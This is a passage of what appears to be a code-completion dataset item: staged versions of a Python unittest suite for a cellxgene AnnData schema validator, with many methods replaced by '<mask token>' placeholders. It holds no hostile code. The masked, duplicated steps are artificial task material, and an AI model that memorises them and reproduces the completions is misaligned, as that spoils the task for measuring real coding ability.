])\n\n def test_default_embedding_is_key_from_obsm(self):\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n self.validator.adata.uns['default_embedding'] = 'X_other'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, it must be a key of 'adata.obsm'.\"\n ])\n\n def test_X_approximate_distribution_is_str(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'count'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['X_approximate_distribution'] = ['count']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' is not valid, it must be a string.\"\n ])\n\n def test_X_approximate_distribution_is_valid(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'COUNT'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is not valid. Allowed terms: ['count', 'normal'].\"\n ])\n\n\nclass TestObsm(unittest.TestCase):\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n self.validator.adata.obsm['X_tsne'] = pd.DataFrame(self.validator.\n adata.obsm['X_umap'], index=self.validator.adata.obs_names)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, 'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ])\n\n def test_obsm_values_at_least_one_X(self):\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n self.validator.adata.obsm['umap'] = self.validator.adata.obsm['X_umap']\n self.validator.adata.uns['default_embedding'] = 'umap'\n del self.validator.adata.obsm['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: At least one embedding in 'obsm' has to have a key with an 'X_' prefix.\"\n ])\n\n def test_obsm_shape(self):\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n self.validator.adata.obsm['X_umap'] = numpy.delete(self.validator.\n adata.obsm['X_umap'], 0, 1)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings must have as many rows as cells, and at least two columns.'adata.obsm['X_umap']' has shape of '(2, 1)'.\"\n ])\n\n\nclass TestAddingLabels(unittest.TestCase):\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.adata_with_labels = examples.adata_with_labels\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n for column in ['feature_name', 'feature_reference']:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n for column in ['assay', 'cell_type', 'development_stage', 'disease',\n 'ethnicity', 'organism', 'sex', 'tissue']:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-2": "<mask token>\n\n\nclass TestObs(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_development_stage_ontology_term_id_human(self):\n \"\"\"\n development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be \"unknown\".\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be the most accurate HsapDv term.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:9606'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' (Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown.\"\n ])\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' (Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ])\n <mask token>\n <mask token>\n <mask token>\n\n def test_organism_ontology_term_id(self):\n \"\"\"\n organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'unknown'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed.\"\n ])\n <mask token>\n <mask token>\n <mask token>\n\n def test_sex_ontology_term_id(self):\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n self.validator.adata.obs['sex_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', or 'unknown' are allowed.\"\n ])\n <mask token>\n\n\nclass TestVar(unittest.TestCase):\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n \"\"\"\n var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.\n \"\"\"\n var = Validator.getattr_anndata(self.validator.adata, 'var')\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n self.validator.validate_adata()\n print('FOO', self.validator.errors)\n self.assertEqual(self.validator.errors, [\n \"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"])\n\n def test_check_unique_var(self):\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ])\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n columns = ['feature_is_filtered', 'feature_biotype']\n for component_name in ['var', 'raw.var']:\n for column in columns:\n if (column == 'feature_is_filtered' and component_name ==\n 'raw.var'):\n continue\n with self.subTest(component_name=component_name, column=column\n ):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n component = Validator.getattr_anndata(self.validator.\n adata, component_name)\n component.drop(column, axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe '{component_name}' is missing column '{column}'.\"\n ])\n\n def test_feature_is_filtered(self):\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n self.validator.adata.var['feature_is_filtered'][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', but there are 1 non-zero values in the corresponding columns of the matrix 'X'. All values for these features must be 0.\"\n ])\n\n def test_columns_not_in_raw_var(self):\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns['X_normalization'] = 'CPM'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"\n ])\n\n def test_feature_id_wrong_format(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSEBML_NOGENE'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' in '{component_name}', make sure it is a valid ID.\"\n ])\n\n def test_feature_id_non_existent_ensembl(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSG000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n def test_feature_id_non_existent_ercc(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ERCC-000000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'spike-in'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n\nclass TestUns(unittest.TestCase):\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n del self.validator.adata.uns['schema_version']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: adata has no schema definition in 'adata.uns'. Validation cannot be performed.\"\n ])\n\n def test_required_fields_title(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n del self.validator.adata.uns['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'title' in 'uns' is not present.\"])\n\n def test_required_fields_X_normalization(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n del self.validator.adata.uns['X_normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_normalization' in 'uns' is not present.\"])\n\n def test_leading_trailing_double_spaces_in_strings(self):\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n self.validator.adata.uns['title'] = ' There is a leading space'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There is a trailing space '\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There are double spaces'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ])\n\n def test_schema_version(self):\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n self.validator.adata.uns['schema_version'] = '1.0.0'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. Validation cannot be performed.\"\n ])\n\n def test_title(self):\n \"\"\"\n Title MUST be a string\n \"\"\"\n self.validator.adata.uns['title'] = ['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['title']' in 'uns['title']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_is_str(self):\n \"\"\"\n X_normalization str.\n \"\"\"\n self.validator.adata.uns['X_normalization'] = ['normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_not_raw(self):\n \"\"\"\n X_normalization str. This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n del self.validator.adata.raw\n self.validator.adata.uns['X_normalization'] = 'none'\n self.validator.validate_adata()\n print('FOO', self.validator.warnings)\n self.assertEqual(self.validator.warnings, [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear to have raw counts (integers)\"\n ])\n\n def test_batch_condition_is_list(self):\n \"\"\"\n batch_condition list[str]\n \"\"\"\n self.validator.adata.uns['batch_condition'] = numpy.array(self.\n validator.adata.uns['batch_condition'])\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['batch_condition'\n ] = 'cell_type_ontology_term_id'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' is not valid, it must be a list or numpy array.\"\n ])\n\n def test_batch_condition_is_column_from_obs(self):\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n self.validator.adata.uns['batch_condition'] = ['NO_COLUMN']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a column in 'adata.obs'.\"\n ])\n\n def test_default_embedding_is_str(self):\n \"\"\"\n Default_embedding str.\n \"\"\"\n self.validator.adata.uns['default_embedding'] = ['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, it must be a string.\"\n ])\n\n def test_default_embedding_is_key_from_obsm(self):\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n self.validator.adata.uns['default_embedding'] = 'X_other'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, it must be a key of 'adata.obsm'.\"\n ])\n\n def test_X_approximate_distribution_is_str(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'count'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['X_approximate_distribution'] = ['count']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' is not valid, it must be a string.\"\n ])\n\n def test_X_approximate_distribution_is_valid(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'COUNT'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is not valid. Allowed terms: ['count', 'normal'].\"\n ])\n\n\nclass TestObsm(unittest.TestCase):\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n self.validator.adata.obsm['X_tsne'] = pd.DataFrame(self.validator.\n adata.obsm['X_umap'], index=self.validator.adata.obs_names)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, 'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ])\n\n def test_obsm_values_at_least_one_X(self):\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n self.validator.adata.obsm['umap'] = self.validator.adata.obsm['X_umap']\n self.validator.adata.uns['default_embedding'] = 'umap'\n del self.validator.adata.obsm['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: At least one embedding in 'obsm' has to have a key with an 'X_' prefix.\"\n ])\n\n def test_obsm_shape(self):\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n self.validator.adata.obsm['X_umap'] = numpy.delete(self.validator.\n adata.obsm['X_umap'], 0, 1)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings must have as many rows as cells, and at least two columns.'adata.obsm['X_umap']' has shape of '(2, 1)'.\"\n ])\n\n\nclass TestAddingLabels(unittest.TestCase):\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.adata_with_labels = examples.adata_with_labels\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n for column in ['feature_name', 'feature_reference']:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n for column in ['assay', 'cell_type', 'development_stage', 'disease',\n 'ethnicity', 'organism', 'sex', 'tissue']:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-3": "<mask token>\n\n\nclass TestObs(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_column_presence(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n \"\"\"\n columns = ['assay_ontology_term_id',\n 'development_stage_ontology_term_id',\n 'disease_ontology_term_id', 'ethnicity_ontology_term_id',\n 'is_primary_data', 'sex_ontology_term_id',\n 'tissue_ontology_term_id']\n for column in columns:\n with self.subTest(column=column):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n self.validator.adata.obs.drop(column, axis=1, inplace=True)\n self.validator.adata.uns.pop('batch_condition')\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe 'obs' is missing column '{column}'.\"])\n <mask token>\n <mask token>\n\n def test_assay_ontology_term_id(self):\n \"\"\"\n assay_ontology_term_id categorical with str categories.\n This MUST be an EFO term and either child of \"EFO:0002772\" or \"EFO:0010183\"\n If there is not an exact match for the assay, clarifying text MAY be enclosed in parentheses and appended to\n the most accurate term. For example, the sci-plex assay could be curated as \"EFO:0010183 (sci-plex)\"\n \"\"\"\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'CL:000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\"\n ,\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n self.validator.adata.obs['assay_ontology_term_id'][0\n ] = 'EFO:0010183 sci-plex'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\"\n ,\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n <mask token>\n\n def test_development_stage_ontology_term_id_human(self):\n \"\"\"\n development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be \"unknown\".\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be the most accurate HsapDv term.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:9606'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' (Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown.\"\n ])\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' (Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ])\n <mask token>\n\n def test_disease_ontology_term_id(self):\n \"\"\"\n disease_ontology_term_id categorical with str categories. This MUST be a MONDO term or\n PATO:0000461 for normal or healthy.\n \"\"\"\n self.validator.adata.obs['disease_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'disease_ontology_term_id' is not a valid ontology term id of 'MONDO, PATO'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ])\n self.validator.errors = []\n self.validator.adata.obs['disease_ontology_term_id'][0\n ] = 'PATO:0001894'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'PATO:0001894' in 'disease_ontology_term_id' is not an allowed term: 